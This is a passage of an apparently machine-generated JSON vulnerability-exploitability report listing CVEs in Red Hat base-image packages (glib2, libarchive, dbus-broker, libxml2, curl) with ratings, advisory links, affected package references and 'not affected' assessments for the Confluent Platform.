          "url": "https://www.cve.org/CVERecord?id=CVE-2026-15588"
        }
      ],
      "published": "2026-07-20T12:17:55+00:00",
      "updated": "2026-08-17T10:16:41+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.68.4-19.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image library (glib2 GDBus) whose D-Bus IPC server is never opened by any product code."
      }
    },
    {
      "id": "CVE-2026-16118",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"
        }
      ],
      "cwes": [
        122
      ],
      "description": "A flaw was found in xdgmime. A heap-based buffer overflow can be triggered in _xdg_mime_magic_parse_magic_line() in the xdgmimemagic.c file on little-endian systems when an attacker-controlled MIME magic file in a user-writable XDG data location (e.g., in the $XDG_DATA_HOME/mime/magic path) is parsed by an application performing MIME type detection (e.g., via g_content_type_guess()). When performing byte-swap, incorrect pointer arithmetic on the write side causes an out-of-bounds write of 2 bytes, resulting in an application crash or memory corruption.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-16118"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-16118"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2501732"
        },
        {
          "url": "https://gitlab.freedesktop.org/xdg/xdgmime/-/work_items/41"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-16118"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-16118"
        }
      ],
      "published": "2026-07-17T20:17:16+00:00",
      "updated": "2026-07-29T17:16:50+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.68.4-19.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image library (glib2/xdgmime) whose MIME-magic detection API is never invoked by any product code."
      }
    },
    {
      "id": "CVE-2026-16517",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        190
      ],
      "description": "A signed integer overflow vulnerability was found in libarchive's ZIP writer. In the archive_write_zip_header function in archive_write_set_format_zip.c, when ZIP encryption is enabled and the entry file size is close to INT64_MAX, the addition of the encryption overhead to the entry size overflows int64_t, resulting in undefined behavior. This could lead to incorrect Zip64 extension decisions or potential memory corruption.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-16517"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:43818"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-16517"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2505492"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-16517"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-16517"
        }
      ],
      "published": "2026-07-21T23:17:00+00:00",
      "updated": "2026-08-19T11:16:46+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.5.3-9.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-16730",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        755
      ],
      "description": "A flaw was found in dbus-broker. When the process file-descriptor limit is reached, EMFILE/ENFILE errors during peer setup (notably SO_PEERPIDFD) are handled as fatal failures, causing the broker to exit. A local attacker who can open many connections to the user session bus can trigger this and deny service to the desktop session. Flatpak applications can reach the host session bus through the dbus proxy.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-16730"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-16730"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2506348"
        },
        {
          "url": "https://github.com/bus1/dbus-broker/issues/435"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-16730"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-16730"
        }
      ],
      "published": "2026-07-24T12:16:47+00:00",
      "updated": "2026-08-14T08:17:37+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/dbus-broker@28-7.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "28-7.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/dbus-broker@28-7.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/dbus-broker@28-7.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/dbus-broker@28-7.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/dbus-broker@28-7.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/dbus-broker@28-7.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/dbus-broker@28-7.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/dbus-broker@28-7.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/dbus-broker@28-7.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/dbus-broker@28-7.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/dbus-broker@28-7.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/dbus-broker@28-7.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/dbus-broker@28-7.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/dbus-broker@28-7.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/dbus-broker@28-7.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/dbus-broker@28-7.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/dbus-broker@28-7.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-1757",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        401
      ],
      "description": "A flaw was identified in the interactive shell of the xmllint utility, part of the libxml2 project, where memory allocated for user input is not properly released under certain conditions. When a user submits input consisting only of whitespace, the program skips command execution but fails to free the allocated buffer. Repeating this action causes memory to continuously accumulate. Over time, this can exhaust system memory and terminate the xmllint process, creating a denial-of-service condition on the local system.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-1757"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7519"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-1757"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2435940"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/1009"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1757"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8460-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-1757"
        }
      ],
      "published": "2026-02-02T13:15:58+00:00",
      "updated": "2026-06-17T10:16:28+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.9.13-14.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-1965",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        305
      ],
      "description": "libcurl can in some circumstances reuse the wrong connection when asked to do\nan Negotiate-authenticated HTTP or HTTPS request.\n\nlibcurl features a pool of recent connections so that subsequent requests can\nreuse an existing connection to avoid overhead.\n\nWhen reusing a connection a range of criterion must first be met. Due to a\nlogical error in the code, a request that was issued by an application could\nwrongfully reuse an existing connection to the same server that was\nauthenticated using different credentials. One underlying reason being that\nNegotiate sometimes authenticates *connections* and not *requests*, contrary\nto how HTTP is designed to work.\n\nAn application that allows Negotiate authentication to a server (that responds\nwanting Negotiate) with `user1:password1` and then does another operation to\nthe same server also using Negotiate but with `user2:password2` (while the\nprevious connection is still alive) - the second request wrongly reused the\nsame connection and since it then sees that the Negotiate negotiation is\nalready made, it just sends the request over that connection thinking it uses\nthe user2 credentials when it is in fact still using the connection\nauthenticated for user1...\n\nThe set of authentication methods to use is set with  `CURLOPT_HTTPAUTH`.\n\nApplications can disable libcurl's reuse of connections and thus mitigate this\nproblem, by using one of the following libcurl options to alter how\nconnections are or are not reused: `CURLOPT_FRESH_CONNECT`,\n`CURLOPT_MAXCONNECTS` and `CURLMOPT_MAX_HOST_CONNECTIONS` (if using the\ncurl_multi API).",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-1965"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55439"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-1965"
        },
        {
          "url": "https://bugzilla.redhat.com/2446448"
        },
        {
          "url": "https://bugzilla.redhat.com/2446450"
        },
        {
          "url": "https://bugzilla.redhat.com/2496758"
        },
        {
          "url": "https://bugzilla.redhat.com/2496763"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446448"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446450"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2496758"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2496763"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-1965.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-1965.json"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1965"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3783"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-8286"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9547"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55439.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55439"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-1965.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55450.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1965"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8084-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8099-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-1965"
        }
      ],
      "published": "2026-03-11T11:15:59+00:00",
      "updated": "2026-06-17T10:16:47+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
